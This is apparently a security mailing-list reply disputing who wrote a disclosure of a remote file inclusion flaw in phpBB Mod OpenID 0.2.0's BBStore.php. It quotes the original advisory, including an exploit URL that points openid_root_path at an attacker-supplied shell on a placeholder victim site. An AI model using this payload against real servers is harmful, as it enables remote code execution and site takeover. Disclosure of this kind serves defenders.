<<< Date Index >>>     <<< Thread Index >>>

Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion



Seph1roth likes to cut and paste.

original author  = xoron.

link: http://www.milw0rm.com/exploits/4471

/str0ke

h3llcode@xxxxxxxxxx wrote:
> +++++++++++++++++++++++++++++++++++++++++++++++++++
> +
> + phpBB Mod OpenID 0.2.0 BBStore.php RFI
> + Risk: High
> + Found by Seph1roth
> + Site: http://blackroots.it
> +
> +++++++++++++++++++++++++++++++++++++++++++++++++++
>
> + Vulnerable Script Download: 
> http://sourceforge.net/project/showfiles.php?group_id=178846
>
> + Exploit:
> http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
>
>